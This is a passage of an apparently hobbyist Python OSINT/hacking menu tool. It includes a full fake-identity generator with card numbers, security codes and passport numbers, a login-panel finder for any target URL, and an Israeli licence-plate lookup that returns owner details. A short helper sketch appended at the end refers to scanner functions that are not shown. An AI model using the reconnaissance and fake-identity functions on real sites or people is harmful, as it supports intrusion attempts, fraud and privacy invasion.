"Pancakes", "None"] 2019 | 2020 | print(f""" 2021 | {White}[{Blue}-{White}] Name : {fake.name()} 2022 | {White}[{Blue}-{White}] Age : {fake_age} 2023 | {White}[{Blue}-{White}] Date Of Birth : {birth_year}/{fake.month()}/{fake.day_of_month()} {fake.time()}{dt.strftime("%p")} 2024 | {White}[{Blue}-{White}] Address : {fake.address()} 2025 | {White}[{Blue}-{White}] Phone No. : {fake.phone_number()} 2026 | {White}[{Blue}-{White}] Email : {fake.email()} 2027 | {White}[{Blue}-{White}] Phone : {random.choice(phones)} 2028 | {White}[{Blue}-{White}] Social Status : {random.choice(social_status_choice)} 2029 | {White}[{Blue}-{White}] Job : {fake.job() if social_status_choice == "Employee" else None} 2030 | {White}[{Blue}-{White}] Company : {fake.company() if social_status_choice == "Employee" else None} 2031 | {White}[{Blue}-{White}] Public IPv4 : {fake.ipv4_public()} 2032 | {White}[{Blue}-{White}] Private IPv4 : {fake.ipv4_private()} 2033 | {White}[{Blue}-{White}] IPv6 : {fake.ipv6()} 2034 | {White}[{Blue}-{White}] Mac Address : {fake.mac_address()} 2035 | {White}[{Blue}-{White}] NIC Card Address : {fake.nic_handle()} 2036 | {White}[{Blue}-{White}] BBAN : {fake.bban()} 2037 | {White}[{Blue}-{White}] IBAN : {fake.iban()} 2038 | {White}[{Blue}-{White}] Credit Card Provider : {fake.credit_card_provider()} 2039 | {White}[{Blue}-{White}] Credit Card No. 
: {fake.credit_card_number()} 2040 | {White}[{Blue}-{White}] Credit Card Sec Code : {fake.credit_card_security_code()} 2041 | {White}[{Blue}-{White}] Credit Card Expire : {fake.credit_card_expire()} 2042 | {White}[{Blue}-{White}] Swift Code : {fake.swift(length=11, primary=True, use_dataset=True)} 2043 | {White}[{Blue}-{White}] Financial balance : {fake.pricetag()} 2044 | {White}[{Blue}-{White}] Passport No. : {fake.passport_number()} 2045 | {White}[{Blue}-{White}] Passport DOB : {birth_year} 2046 | {White}[{Blue}-{White}] Car : {random.choice(cars)} {fake.color_name()} 2047 | {White}[{Blue}-{White}] Car License Plate : {fake.license_plate()} 2048 | {White}[{Blue}-{White}] Car Body No. : {fake.vin()} 2049 | {White}[{Blue}-{White}] Fav Color : {fake.color_name()} 2050 | {White}[{Blue}-{White}] Fav Food : {random.choice(foods)}""") 2051 | else: print(f"{Red}Please choose a correct option!") 2052 | elif selection == "23" or selection == "Create Hashtags" or selection == "CREATE HASHTAGS" or selection == "create Hashtags": 2053 | keyword = input(f"{White}[{Blue}+{White}] Enter the keyword (ex: hacking) : {Blue}") 2054 | 2055 | url = f"http://hashmeapi-stage.us-west-2.elasticbeanstalk.com/search?q={keyword}" 2056 | r = requests.get(url) 2057 | hashtags = r.json() 2058 | if len(hashtags) > 1: 2059 | for i in range(len(hashtags)): 2060 | print(f"#{hashtags[i]}") 2061 | else: print(f"{White}Try another keyword") 2062 | elif selection == "24" or selection == "Extract Login Panels" or selection == "EXTRACT LOGIN PANELS" or selection == "extract login panels": 2063 | def find_login_panel(url): 2064 | try: 2065 | user_agent = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'} 2066 | response = requests.get(url, headers=user_agent, verify=False, timeout=8, allow_redirects=True) 2067 | soup = BeautifulSoup(response.content, "html.parser") 2068 | forms = soup.find_all("form") 2069 | if forms: 2070 | login_form = forms[0] 2071 | action = login_form.get("action") 2072 | if action and not action.startswith("http"): 2073 | action = url + action 2074 | print(f"\n{White}[{Green}✓{White}] Login Panel Found : {Yellow}{action}") 2075 | else: 2076 | print(f"\n{White}[{Red}X{White}] Not any login panel found") 2077 | except BaseException as msg: print(f"{Red}E: {msg}") 2078 | 2079 | url = input(f"{White}[{Blue}+{White}] Enter the URL target : {Blue}") 2080 | 2081 | print(f"{White}Extracting...") 2082 | time.sleep(3) 2083 | print(f"[ Extract for {Blue}{url} {Green}✓{White} ]") 2084 | time.sleep(1) 2085 | find_login_panel(url) 2086 | elif selection == "25" or selection == "Cars OSINT" or selection == "CARS OSINT" or selection == "cars osint": 2087 | car_country = input(f"""{White}[{Blue}01{White}] Israel [IL] 2088 | {White}[{Blue}+{White}] Enter the country name or countrycode : {Blue}""") 2089 | 2090 | if car_country == "Israel" or car_country == "IL": 2091 | try: 2092 | plate_number = input(f"{White}[{Blue}+{White}] Enter the plate number (ex: 123-45-6 78) : {Blue}") 2093 | print(f"{White}Getting info...") 2094 | time.sleep(3) 2095 | print(f"[ Get Info for {Blue}{plate_number} {Green}✓{White} ]") 2096 | time.sleep(1) 2097 | 2098 | veh_request_json = {"DynamicTemplateID":"af3b0f3e-7b99-4a3f-a9cf-15e02384fe1c","QueryFilters":{"skip":{"Query":"0"},"mispar_rechev":{"Query":plate_number}},"From":"0"} 2099 | 2100 | data = requests.post("https://www.gov.il/he/api/DataGovProxy/GetDGResults", json=veh_request_json) 2101 | 2102 | value = 
json.loads(data.text)
2103 | car_name = value['Results'][0]['Data']['tozeret_nm']
2104 | trade_name = value['Results'][0]['Data']['kinuy_mishari']
2105 | model = value['Results'][0]['Data']['shnat_yitzur']
2106 | owner = value['Results'][0]['Data']['baalut']
2107 | car_color = value['Results'][0]['Data']['tzeva_rechev']
2108 |
2109 | table = Table(title="")
2110 | table.add_column("Info", no_wrap=True)
2111 | table.add_column("Car")
2112 | table.add_row("Car Name", car_name)
2113 | table.add_row("Trade Name", trade_name)
2114 | table.add_row("Model Year", model)
2115 | table.add_row("Car Color", car_color)
2116 | table.add_row("Current Owner", owner)
2117 | Console().print(table, justify="left")
2118 | except BaseException as msg: print(f"{Red}E: {msg}")
2119 | else: print(f"{Red}Please choose a correct country name or countrycode!")
2120 | elif selection == "97" or selection == "Update" or selection == "UPDATE":
2121 | print(f"{White}Updating...\n")
2122 |
2123 | time.sleep(0.1)
2124 |
2125 | spinner = ["|", "/", "-", "\\"]
2126 | spinner_index = 0
2127 |
2128 | steps = 50
2129 |
2130 | for i in range(steps):
2131 | percent = 100*(i+1)/steps
2132 | bar_length = 50
2133 | filled_length = int(bar_length*percent/100)
2134 |
2135 | bar = "█"*filled_length+"-"*(bar_length-filled_length)
2136 | sys.stdout.write(f"\r{Green}{spinner[spinner_index % len(spinner)]}{White} [{bar}] {percent:.2f}%")
2137 | sys.stdout.flush()
2138 | spinner_index += 1
2139 | time.sleep(0.1)
2140 |
2141 | subprocess.run(["git", "clone", "https://github.com/tlersa/TS-OSINT.git"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
2142 | print(f"""\n{White}[{Green}✓{White}] Updated successfully
2143 | new version saved in {Blue}{os.getcwd()}\\TS-OSINT{White}""")
2144 | elif selection == "98" or selection == "Report A Bug" or selection == "REPORT A BUG" or selection == "report a bug":
2145 | print(f"""{White}Contact me through one of my accounts
2146 | all my accounts : {Blue}https://tlersa.github.io/tleralshahrani/Index.html#contact""")
2147 | elif selection == "99" or selection == "Help" or selection == "HELP" or selection == "help":
2148 | print(f"""{White}Contact me through one of my accounts
2149 | all my accounts : {Blue}https://tlersa.github.io/tleralshahrani/Index.html#contact""")
2150 | elif selection == "00" or selection == "Exit" or selection == "EXIT" or selection == "exit": exit(f"{White}")
2151 | else: print(f"{Red}Please choose a correct option!")
2152 | another_operation()
2153 |
2154 | def main():
2155 | main_menu()
2156 |
2157 | while True:
2158 | user_input = input(f"{White}Choose : {Blue}")
2159 | handle_selection(user_input)
2160 |
2161 | if __name__ == "__main__": main()
2162 | --------------------------------------------------------------------------------
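# A minimal sketch (not part of TS-OSINT.py) of a shared request helper: the scanner functions
# above (path_traversal, ssrf, rce, lfi, rfi, and others) call requests.get without a timeout,
# so one unresponsive target can stall the whole scan. The name `safe_get` is hypothetical.
import requests

def safe_get(url, timeout=8, **kwargs):
    # Central place to enforce a timeout and absorb connection errors so a dead
    # host does not abort the scan loop; callers should treat None as "no response".
    try:
        return requests.get(url, timeout=timeout, **kwargs)
    except requests.exceptions.RequestException:
        return None

# Usage sketch: response = safe_get(f"{url}/{payload}"); skip the check when response is None.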